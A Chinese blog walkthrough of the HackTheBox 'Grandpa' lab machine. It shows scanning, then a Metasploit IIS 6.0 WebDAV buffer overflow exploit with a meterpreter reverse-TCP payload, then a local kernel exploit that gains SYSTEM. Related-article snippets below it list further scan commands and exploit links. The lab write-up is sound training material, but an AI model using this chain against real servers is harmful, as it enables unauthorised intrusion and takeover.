Hackthebox::grandpa walkthrough

最新推荐文章于 2022-10-10 14:35:59 发布
最新推荐文章于 2022-10-10 14:35:59 发布
阅读量2k 收藏
点赞数
分类专栏: walkthrough 文章标签: windows 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missmxr/article/details/122182941
版权
  • Grandpa是hackthebox上一台难度为简单的windows靶机

信息收集

  • 首先使用nmap扫描一下端口情况

image-20211227230552901

  • 然后使用nmap扫描一下是否存在漏洞

image-20211227230757330

  • 通过两次nmap的扫描,我们得知靶机开放了80端口,并且存在漏洞
  • 使用searchsploit扫描Microsoft IIS httpd 6.0服务,看看是否有可以被利用的漏洞

image-20211227231051633

  • 我们发现了许多可以使用的脚本,再次使用msf查看是否可以利用‘

image-20211227231247078

  • 我们发现了可以利用的部分,我们使用第二个
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         10.129.166.10    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86
  • 我们成功进入了,但是很可惜我们的权限不足

image-20211227231707825

  • 我们将迁移进程,并且寻找合适的漏洞利用脚本来入侵
  • 迁移进程

image-20211227231911796

  • 使用suggester查看可以利用漏洞的脚本

image-20211227232427257

  • 我们发现了以下可以使用的方式,我们选择exploit/windows/local/ms14_070_tcpip_ioctl

image-20211227233022025

  • 完成设置

image-20211227233230168

  • 好的,我们成功了,获得了最高权限

image-20211227233425946

  • 查看flag

image-20211227233646152

维基人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-grandpa(考点:iis6.0)不用MSF
冬萍子癸水
04-15 309
这靶机绝大部分人都是msf做的,毕竟适合这个靶机的漏洞文件没多少(还是中国人发现的呢),都是和msf相关,(而且用msf做也很不稳定,这靶机在论坛里也被吐槽),我好不容易找到个非msf的方法 nmap 从名字就可以看出。grandpa老爷爷和granny老奶奶这篇很像,没啥突破口,就是webdav信息多 故地重游 再来扫webdav 但是这次不一样了,都是fail 最后只能网上搜啊搜。。。搜到e...
Hackthebox:Grandpa Walkthrough(not use metasploit)
汗的博客
12-09 252
基本和granny差不多 预备知识 nikto、nmap、iis6.0的webdav windows低权限用户可写的目录 CVE:2017-7269、巴西烤肉(churrasco.exe) 信息收集和获取立足点 先探测端口服务 nmap 10.10.10.14 只开了一个80的http,先浏览器访问一下 只是一个报错页面,nikto探测一下 nikto -h http://10.10.10.14 输出结果,可以看到是iis6.0,而且有DAV还有MicrosoftOfficeWebServer + Ser
Hack the box靶机 Grandpa
菜浪马废的博客
05-28 226
migrate进程迁移 win的题怎么都是用msf做的呢 看大佬们没有不用msf的
HackTheBox::Grandpa
最新发布
aya3t的博客
10-10 150
HackTheBox::Grandpa
HackTheBox-Grandpa渗透测试
weixin_43111940的博客
04-14 215
端口信息(网络限制就不挨个扫端口了) sudo nmap -sC -sV -A -p 80 10.10.10.14 可以看到操作系统、web中间件、允许的http-method等信息 IIS 6.0的已知漏洞非常多,比如很著名的文件解析漏洞(现在很少了,但是面试的时候经常有) 搜一下IIS 6.0 exploit 找到了一个shell https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269 但是报错了,换了别的脚本也不行,试了半个小时才发现是因为服
grandpa-bridge-gadget:最终爷爷的小工具
03-25
结实的(B脊ËfficiencyËnabling˚Finalityýielder)是沿GRANDPA终局运行的辅助协议,以支持高效的桥接与非底物blockchains,目前主要ETH mainnet。 可以将其视为GRANDPA Finality协议的(可选)特定于网桥的小...
finality-grandpa:使用通用前缀协议的区块链的finality小工具
05-15
finality-grandpa 爷爷,基于主机ģřecursive AN cestor d eriving P refix甲greement,为blockchains一个终局小工具,在锈病实现。 它允许一组节点就由某些外部块生产机制产生的规范链达成BFT协议。 它在部分同步...
FxxkOnmyoji:阴阳师给爷爬 | Onmyoji climbing for your grandpa
05-12
如何成为一名合格的阴阳带师本脚本仅供学习参考,不收取任何费用,如果你是付钱获取的,那么你可真的憨批。​ ——作者:李英俊小朋友[TOC]写在前面 | Write Head这是一个关于 阴阳师 的脚本,如果你不小心点进来了...
review-and-css-typesetting:关于
05-31
$ git clone -b v0.2.0 git@github.com:at-grandpa/review-and-css-typesetting.git 手册PDF 手册的PDF链接在下面(发行页面上的PDF链接)。它描述了如何设置以及如何继续编写。 此 PDF 还可用作示例 PDF。如果你...
huc:各种实用程序
03-19
HUC:各种实用程序使您的生活更轻松 HUC是一种易于使用的命令行工具,可用于执行各种任务,...huc email -h= " smtp.somerelay.org " -from= " someone@aol.com " -to= " grandma@aol.com " -s= " Grandpa Birthday
No.57-HackTheBox-windows-Grandpa-Walkthrough渗透学习
qq_34801745的博客
02-17 539
** HackTheBox-windows-Arctic-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/9 靶机难度:中级(4.7/10) 靶机发布日期:2017年10月4日 靶机描述: Grandpa is one of the simpler machines on Hack The Box, howev...
IIS6.0(CVE-2017-7269) 缓冲器溢出
weixin_30377461的博客
09-09 450
漏洞描述开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。 漏洞编号CVE-2017-7269 漏洞等级高危 影响产品Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0 漏洞环境搭建我的环境是windows 2003 R2 E...
iis6.0(cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因
redwand的博客
05-04 1259
网上看到的iis6.0(cve-2017-7269)的利用文章,要么只有远程利用不包含本地提权,要么包含本地提权却没有常见失败原因,故有此文 本篇文章面向有一点windows命令行基础,kali基础,msf基础的同学
Hackthebox(1)系列持续更新
FryhRx的博客
04-14 4741
Hackthebox第一关 文章目录Hackthebox第一关前言一、Hackthebox配置openvpn?配置openvpn二、第0层(简单)终端弄好以后点击产卵机,然后会给你创建一个实例问题 1问题 2问题 3问题 4问题 5问题 6问题 7问题 82.拿flag总结 前言 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、Hackthebox配置openvpn? Hackthebox是国外的一个靶场。 配置
Metasploit复现 IIS6.0远程溢出漏洞
土豆回锅的博客
01-24 3939
漏洞描述 开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。 漏洞编号 CVE-2017-7269 漏洞等级 高危 影响产品 Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0 漏洞环境搭建 我的环境是windows 20
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)
mirror97black的博客
01-24 4281
漏洞简介 漏洞编号:CVE-2017-7269 发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 漏洞类型:缓冲区溢出 漏洞等
Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow (CVE-2017-7269)
ai749499的博客
01-07 325
ExplodingCanhttps://github.com/danigargu/explodingcan An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA. Details Vulnerability: Microsoft...
Microsoft IIS WebDAV安全漏洞修复参考
煜铭2011
04-27 3317
0x01 漏洞简介 Windows Server是微软发布的一系列服务器操作系统。Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDAV服务的‘ScStoragePathFromUrl’函数
Hack the box -- 靶机渗透测试(TIER2)
wjishuxiaobai的博客
06-25 1667
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机,靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20(-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
"英语单词3500分类记忆手册:家庭与人物总称
law(媳妇)、family(家庭、家族)、father(父亲)、fiance(未婚夫)、fiancee(未婚妻)、grandchild(外孙、外孙女)、granddaughter(外孙女)...grandpa(外祖母、始祖)、grandparents(祖父母、外祖父母)等等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值